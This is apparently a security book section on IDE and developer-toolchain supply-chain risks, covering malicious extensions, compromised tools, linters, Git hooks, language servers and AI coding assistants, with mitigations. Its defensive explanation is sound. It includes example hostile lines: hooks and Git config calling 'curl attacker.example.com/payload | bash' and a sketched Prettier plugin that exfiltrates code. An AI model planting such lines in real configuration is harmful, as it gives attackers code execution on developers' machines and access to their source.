16.3 IDE and Toolchain Security

In [May 2023][checkpoint-vscode], security researchers from Check Point discovered malicious VS Code extensions that had been downloaded over 45,000 times. These extensions—masquerading as legitimate development tools—stole credentials, installed backdoors, and exfiltrated code.

[checkpoint-vscode]: https://blog.checkpoint.com/securing-the-cloud/malicious-vscode-extensions-with-more-than-45k-downloads-steal-pii-and-enable-backdoors/

The attack exploited a fundamental truth: developers implicitly trust their development environment. When you install an IDE extension, run a linter, or execute a Git hook, you're running code with access to your source files, credentials, and often network connectivity. The same supply chain risks that affect npm packages affect the tools developers use to write code.

This section addresses security risks in IDEs, extensions, and developer toolchains, providing guidance for vetting tools and managing the developer tool ecosystem.

Malicious IDE Extensions and Plugins

IDE extensions are software supply chain dependencies, but few organizations treat them as such.

VS Code Extension Security Model:

VS Code extensions run with the same privileges as VS Code itself—meaning full access to:

  • All files VS Code can access
  • Network connectivity
  • Terminal execution
  • Credential stores
  • Extension APIs (Git, debugging, etc.)

There is no sandbox. An installed extension can read your code, exfiltrate data, and execute arbitrary commands.
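
A quick way to start treating extensions as dependencies is to inventory them. A minimal audit sketch using VS Code's real CLI flags (the output file name is arbitrary):

# List installed extensions with versions, sorted, so the inventory can
# be reviewed and diffed like any other dependency manifest
code --list-extensions --show-versions | sort > extensions.lock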

Extension Marketplace Risks:

| Risk | Description |
|------|-------------|
| Typosquatting | Extensions with names similar to popular ones |
| Abandoned takeover | Popular extensions acquired by malicious actors |
| Malicious updates | Initially benign extensions turned malicious |
| Trojanized copies | Copies of popular extensions with added malware |
| Fake publishers | Publisher names mimicking legitimate developers |

Case Study: VS Code Malicious Extensions (2023)

Researchers from [Check Point][checkpoint-vscode] discovered multiple malicious VS Code extensions:

  • "Prettiest java": Typosquatting "Prettier" - stole credentials
  • "Theme Darcula dark": Injected info-stealer malware
  • "python-vscode": Masquerading as official Python extension

These extensions were downloaded over 45,000 times before removal. The attack demonstrated that VS Code Marketplace vetting is insufficient to prevent malicious uploads.

Case Study: Material Theme Extension Removal (2025)

In early 2025, Microsoft removed two of the most popular VS Code extensions—Material Theme and Material Theme Icons—which together had been downloaded nearly 9 million times.[^1] The removal came after security researchers identified concerning behaviors in the extensions.

Security analysis revealed several red flags:

  • Obfuscated code: The extensions contained heavily obfuscated JavaScript that obscured their true functionality
  • Suspicious network activity: Code patterns suggested potential data collection beyond what a theme extension should require
  • External payload loading: Evidence of code designed to fetch and execute content from external sources
  • Unusual permissions: The extensions requested capabilities unnecessary for their stated purpose of providing visual themes

The incident highlighted a particularly insidious risk: long-trusted extensions can become threats. Unlike the typosquatting attacks that rely on tricking developers into installing a fake extension, Material Theme was a legitimate, popular extension that had earned community trust over years. When its behavior changed—whether through maintainer compromise, acquisition, or intentional modification—millions of users were exposed.

Microsoft's response drew mixed reactions. Some praised the proactive removal; others criticized Microsoft for insufficient communication and for the collateral damage to developers who depended on these extensions. The incident underscored several lessons:

  • Popularity doesn't equal safety: Even extensions with millions of downloads require ongoing scrutiny
  • Theme extensions shouldn't need network access: Any extension requesting capabilities beyond its stated function warrants investigation
  • Ownership changes matter: Extensions that change hands or update after long dormancy should be re-evaluated
  • Obfuscation is a red flag: Legitimate extensions rarely need to hide their code, especially for simple functionality like themes

For organizations, the Material Theme incident reinforced the need for continuous monitoring of installed extensions, not just point-in-time vetting during installation.

JetBrains Plugin Security:

JetBrains IDEs (IntelliJ, PyCharm, WebStorm) have a similar trust model:

  • Plugins execute with full IDE privileges
  • The JetBrains Marketplace has a review process, but it is not foolproof
  • Third-party plugin repositories have no vetting at all

JetBrains Plugin Trust Model:
┌─────────────────────────────────────────────┐
│                JetBrains IDE                │
│  ┌───────────────────────────────────────┐  │
│  │                 Plugin                │  │
│  │  - Full file system access            │  │
│  │  - Network access                     │  │
│  │  - Code execution                     │  │
│  │  - IDE API access                     │  │
│  │  - Credential store access            │  │
│  └───────────────────────────────────────┘  │
└─────────────────────────────────────────────┘

Extension Vetting Criteria:

Before installing any IDE extension:

| Factor | What to Check | Red Flags |
|--------|---------------|-----------|
| Publisher | Verified publisher, known organization | Unknown publisher, generic name |
| Downloads | Substantial download count | Very few downloads |
| Reviews | Genuine reviews, active responses | No reviews, fake-looking reviews |
| Source code | Open source, auditable | Closed source, no repository |
| Permissions | Minimal, appropriate for function | Excessive permissions |
| Update history | Regular, documented updates | Recent acquisition, ownership change |
| Dependencies | Minimal, known dependencies | Many unknown dependencies |

Security teams increasingly treat IDE extensions with the same level of scrutiny as browser extensions, recognizing that a malicious extension has access to all source code and credentials.

Supply Chain Attacks on Developer Tools

Beyond extensions, the tools themselves can be compromised.

XcodeGhost (2015):

Attackers distributed a modified version of Xcode (Apple's development environment) through Chinese file-sharing sites. Developers who used this "XcodeGhost" version unknowingly compiled malware into their iOS applications. Research eventually identified more than 2,500 affected apps, which an estimated 128 million users had downloaded. High-profile victims included WeChat, Angry Birds 2, and Didi Kuaidi.

Lessons:

  • Download development tools only from official sources
  • Verify cryptographic signatures
  • Use package managers that verify integrity

Codecov Bash Uploader (2021):

The Codecov bash uploader script (used in CI/CD for code coverage) was compromised. For two months, the modified script exfiltrated environment variables—including CI/CD credentials—to attacker-controlled servers. Affected organizations included HashiCorp, Twilio, Rapid7, and many others.

Lessons:

  • Pin tool versions with checksums
  • Don't pipe curl to bash without verification
  • Monitor for unexpected network activity in CI/CD

Toolchain Verification Practices:

# DON'T: Unverified download and execute
curl -s https://example.com/install.sh | bash

# DO: Download, verify, then execute
curl -o install.sh https://example.com/install.sh
curl -o install.sh.sig https://example.com/install.sh.sig
gpg --verify install.sh.sig install.sh
bash install.sh

# DO: Use package managers with verification
brew install tool  # Homebrew verifies checksums
apt install tool   # APT verifies signatures
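
The same pattern applies when a vendor publishes checksums rather than signatures. A sketch of checksum pinning; the URL and hash are placeholders, and sha256sum is GNU coreutils (use shasum -a 256 on macOS):

# Pin a tool download to a known SHA-256
TOOL_URL="https://example.com/tool-v1.2.3.tar.gz"
EXPECTED_SHA256="0000000000000000000000000000000000000000000000000000000000000000"

curl -fsSLo tool.tar.gz "$TOOL_URL"
echo "${EXPECTED_SHA256}  tool.tar.gz" | sha256sum -c - || {
  echo "Checksum mismatch: refusing to install" >&2
  exit 1
}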

Linters and Formatters as Code Execution Vectors

Linters and formatters execute automatically—often on every file save. This makes them attractive attack vectors.

How Linters Execute Code:

Many linters and formatters can execute arbitrary code through configuration:

// .eslintrc.js - JavaScript file, executes on lint
module.exports = {
  // This code runs when ESLint loads
  rules: {
    // Attacker could add: require('child_process').execSync('malicious command')
  }
};

# .pre-commit-config.yaml can specify arbitrary commands
repos:
  - repo: local
    hooks:
      - id: "format"
        name: "format"
        entry: bash -c "curl attacker.example.com/payload | bash"  # Malicious
        language: system

ESLint Plugin Attacks:

ESLint plugins are npm packages that execute during linting. A malicious plugin could read every source file being linted, execute arbitrary code, exfiltrate data, and modify files; like any locally running npm package, it has access to the full file system, the network, and environment variables.

Prettier Plugin Risks:

Prettier plugins similarly execute during formatting:

// Illustrative sketch: a malicious Prettier plugin intercepts all code
// being formatted (exfiltrate and actualParse are placeholder names)
module.exports = {
  parsers: {
    babel: {  // overrides the parser Prettier uses for JavaScript
      parse: (text) => {
        exfiltrate(text);         // attacker code runs on every format
        return actualParse(text); // then defer to the real parser
      }
    }
  }
};

Mitigation Strategies:

  1. Pin linter versions: Don't auto-update linting tools
  2. Review configuration files: Treat .eslintrc.js, prettier.config.js as executable code
  3. Limit plugin use: Only install plugins from trusted sources
  4. Use JSON/YAML configs: Where possible, avoid JavaScript config files that can execute code
  5. Audit in CI/CD: Alert on linter configuration changes (see the sketch below)
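
The fifth item can be automated with a small CI guard that fails the build whenever linter or hook configuration files change, forcing an explicit review. A minimal sketch, assuming bash and a default branch of origin/main:

#!/usr/bin/env bash
set -euo pipefail

# Fail the build if linter or hook configuration changed on this branch
PROTECTED='(\.eslintrc.*|prettier\.config\.js|\.pre-commit-config\.yaml|\.husky/)'

base="$(git merge-base HEAD origin/main)"
changed="$(git diff --name-only "$base" HEAD | grep -E "$PROTECTED" || true)"

if [ -n "$changed" ]; then
  echo "Linter/hook configuration changed; require security review:"
  echo "$changed"
  exit 1
fi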

Git Hooks and Security Implications

Git hooks are scripts that Git executes automatically at certain points in the workflow. They're powerful—and dangerous.

Git Hook Types:

| Hook | When It Runs | Risk |
|------|--------------|------|
| pre-commit | Before a commit is created | Code execution on commit |
| post-checkout | After checkout or clone | Code execution on clone |
| post-merge | After a merge | Code execution on pull |
| pre-push | Before a push | Code execution on push |

The Clone-Time Execution Problem:

Git hooks in .git/hooks/ are not transferred during clone—that's intentional security. However, developers often use tools like Husky that install hooks automatically:

// package.json with Husky
{
  "scripts": {
    "prepare": "husky install"  // Runs on npm install
  }
}

This means npm install on a cloned repository can install and execute Git hooks.
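
Before running npm install in a freshly cloned repository, it is worth listing the lifecycle scripts that would execute automatically. npm (version 7 and later) provides this directly:

# Show lifecycle scripts (prepare, postinstall, etc.) before they run
npm pkg get scripts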

Attack Scenario:

# Attacker submits PR with:
# 1. Modified package.json to install hooks
# 2. Malicious hook in .husky/pre-commit

# Victim clones and runs npm install
# Malicious pre-commit hook now runs on every commit

Git Config Injection:

Git configurations can also execute code:

# .gitconfig or .git/config
[core]
    # Malicious: executes on operations
    sshCommand = bash -c 'curl attacker.example.com/payload | bash; ssh "$@"'

    # Malicious: executes editor on interactive operations
    editor = bash -c 'malicious_command; vim "$@"'
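
A quick audit sketch that surfaces config keys capable of executing commands (git config prints keys in lowercase, hence the case-insensitive match):

# List effective config with its source file, then filter for keys that
# can run commands during ordinary Git operations
git config --list --show-origin | grep -Ei 'sshcommand|core\.editor|fsmonitor|pager'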

Safe Git Hook Practices:

  1. Review hook installations: Check what npm install, pip install, etc. install as hooks
  2. Audit .husky/ and similar directories: Treat hook files as executable code
  3. Use hook allowlists: In enterprise, define approved hook managers
  4. Disable hooks for untrusted repos: clone with an empty template directory (git clone --template=) so no template hooks are installed (see the sketch below)
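
Practices 2 through 4 combine into a workable routine for untrusted repositories. A minimal sketch, assuming npm and Husky as in the earlier example (the repository URL is a placeholder):

# Clone without copying any template hooks
git clone --template= https://example.com/untrusted/repo.git
cd repo

# Install dependencies without running lifecycle scripts, which blocks
# "prepare": "husky install" from registering hooks
npm ci --ignore-scripts

# Inspect whatever the repo ships as hooks before enabling anything
ls -la .husky/ 2>/dev/null || true

# Optionally disable hooks entirely by pointing Git at an empty path
git config core.hooksPath /dev/null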

Language Server Protocols and Local Code Execution

Language Server Protocol (LSP) enables IDE features like autocomplete, go-to-definition, and error checking. LSP servers execute locally and process your code.

LSP Security Model:

┌──────────────────┐     ┌───────────────────┐
│       IDE        │◄───►│    LSP Server     │
│  (VS Code, etc.) │     │                   │
│                  │     │ - Reads all code  │
│                  │     │ - Executes locally│
│                  │     │ - Has file access │
└──────────────────┘     └───────────────────┘

LSP servers:

  • Read and parse source code files
  • Execute on the developer's machine
  • Often run with the same privileges as the IDE
  • May make network calls (for package resolution, etc.)

LSP Risks:

| Risk | Example |
|------|---------|
| Malicious LSP server | Compromised language server exfiltrates code |
| Dependency confusion | LSP server pulls from a compromised package source |
| Code execution bugs | Crafted source file exploits an LSP server vulnerability |
| Data collection | LSP server sends telemetry including code snippets |

TypeScript Server Vulnerability Example:

In 2023, a vulnerability in the TypeScript language server could be exploited via crafted package.json files. Opening a malicious project in VS Code could execute arbitrary code.

Mitigation:

  • Use official LSP servers from language maintainers
  • Keep LSP servers updated
  • Monitor LSP server network activity (see the spot-check sketch after this list)
  • Review LSP server permissions and configuration
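
For the network-monitoring item, a rough spot-check on a developer machine; the process name tsserver is an example, so substitute your language server:

# Find a running TypeScript server and list its open network connections
pid="$(pgrep -f tsserver | head -n1)"
[ -n "$pid" ] && lsof -nP -i -a -p "$pid"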

Enterprise Extension Management

Organizations need strategies to manage developer tool ecosystems at scale.

VS Code Extension Management:

// Managed settings using VS Code's extensions.allowed policy (available
// for organization-managed installs). Values may be true/false, a version
// list, or "stable"; keys may be an extension ID or a bare publisher name.
{
  "extensions.allowed": {
    // Allow specific extensions
    "ms-python.python": true,
    "esbenp.prettier-vscode": true,
    "dbaeumer.vscode-eslint": true,
    // Block everything from a publisher
    "suspicious-publisher": false
  }
}

Centralized Extension Policies:

| Approach | Implementation |
|----------|----------------|
| Allowlist | Only approved extensions can be installed |
| Blocklist | Known-bad extensions blocked |
| Publisher trust | Only verified publishers allowed |
| Private marketplace | Host approved extensions internally |
| Monitoring | Alert on unauthorized extension installation (see the sketch below) |
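
The monitoring row can be approximated with a small script that diffs installed extensions against the allowlist; the allowlist file name here is hypothetical:

# Report any installed extension not present in the approved list
# (requires bash for process substitution)
comm -23 \
  <(code --list-extensions | sort) \
  <(sort approved-extensions.txt) |
while read -r ext; do
  echo "ALERT: unapproved extension installed: $ext"
done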

JetBrains Plugin Management:

JetBrains IDEs support custom plugin repositories:

# idea.properties: point the IDE at an internal plugin repository
idea.plugins.host=https://plugins.internal.example.com

Extension Governance Process:

## Extension Approval Process

### Request
1. Developer requests extension via ticket
2. Include: Extension name, publisher, purpose, URL

### Review
1. Security reviews extension source (if available)
2. Check publisher reputation and history
3. Analyze permissions requested
4. Test in isolated environment
5. Verify no malicious indicators

### Decision
- Approved: Add to allowlist
- Denied: Document reason, suggest alternatives
- Conditional: Approved with restrictions

### Monitoring
- Quarterly review of approved extensions
- Alert on extension ownership changes
- Reassess on security incidents

AI Coding Assistant Security Considerations

AI coding assistants (GitHub Copilot, Amazon CodeWhisperer, Codeium) introduce new supply chain risks.

Data Leakage Risks:

AI assistants send code to external servers for processing:

| Risk | Description |
|------|-------------|
| Code exfiltration | Proprietary code sent to AI provider |
| Secret exposure | API keys and credentials in code sent externally |
| Context bleeding | Code from one project influences suggestions in another |
| Training data | Your code may train future models (policy dependent) |

Suggestion Risks:

AI assistants suggest code that may include:

  • Vulnerable patterns: Known insecure code from training data
  • Outdated practices: Deprecated APIs, old security patterns
  • License issues: Code snippets from copyrighted sources
  • Hallucinated packages: Non-existent packages that could be typosquatted

Package Hallucination:

Research has shown AI assistants suggest packages that don't exist—a vector for "slopsquatting":

# AI suggests:
import flask_security_utils  # Package doesn't exist!

# Attacker could register this package name
# Anyone using the AI suggestion would install malware
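
A sketch of the verification step: check whether an AI-suggested Python package actually exists on PyPI before anything installs it. The package name comes from the example above; note that PyPI normalizes underscores and hyphens in names:

# Query PyPI's JSON API; a 404 means the package does not exist
pkg="flask_security_utils"
status="$(curl -s -o /dev/null -w '%{http_code}' "https://pypi.org/pypi/${pkg}/json")"
if [ "$status" != "200" ]; then
  echo "Package '${pkg}' not found on PyPI; possible hallucination." >&2
fi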

AI Assistant Governance:

## AI Coding Assistant Policy

### Approved Tools
- GitHub Copilot (Business tier with data protection)
- [List other approved tools]

### Prohibited Uses
- Code containing secrets or credentials
- Highly sensitive/classified projects
- Code subject to specific compliance requirements

### Required Practices
- Review all AI suggestions before accepting
- Never accept package imports without verification
- Report hallucinated package names to security team
- Disable AI assistance for sensitive files

### Configuration
- Enable organization-managed settings
- Disable code snippet sharing for training
- Configure IDE to exclude sensitive directories

Secure AI Assistant Configuration:

// VS Code settings for Copilot: disable suggestions for file types
// likely to contain secrets or configuration
{
  "github.copilot.enable": {
    "*": true,
    "plaintext": false,  // may contain secrets
    "markdown": false,
    "yaml": false        // config files
  }
}

Note: file- and path-level exclusions (for example, **/.env* or **/secrets/**) are configured server-side through Copilot's content exclusion settings at the GitHub organization or repository level, not in local VS Code settings.

Development teams continue to report AI coding assistants suggesting non-existent packages in practice, which is why verifying every AI-suggested package import before use has become a standard control against slopsquatting.

Recommendations

For Developers:

  1. We recommend vetting extensions like dependencies. Before installing any IDE extension, check the publisher, download count, and source code availability. Unknown extensions are untrusted code.

  2. We recommend verifying tool downloads. Download development tools only from official sources. Verify signatures where available.

  3. You should review AI suggestions critically. Don't accept package imports without verifying the package exists and is trustworthy. AI assistants hallucinate.

For Security Practitioners:

  1. We recommend implementing extension governance. Create allowlists for approved IDE extensions. Monitor for unauthorized installations.

  2. We recommend treating configs as code. Linter configs, Git hooks, and tool configurations can execute arbitrary code. Review them in code review.

  3. We recommend assessing AI assistant risks. Understand what code goes to AI providers. Establish policies for sensitive projects.

For IT Administrators:

  1. We recommend deploying private extension marketplaces. For high-security environments, host approved extensions internally.

  2. We recommend configuring telemetry appropriately. Understand what data IDE and tools collect. Configure per organizational policy.

  3. We recommend monitoring developer tool behavior. Alert on unexpected network connections from IDE processes, especially to unusual destinations.

The developer toolchain is a supply chain within the supply chain. Every extension, plugin, linter, and AI assistant is code running with access to your most sensitive asset—the code you're writing. Organizations that recognize this and apply supply chain security principles to their development environment close a significant gap that attackers increasingly target.


[^1]: Visual Studio Marketplace download statistics and Microsoft Marketplace data, January 2025; multiple security researchers documented the download counts prior to removal.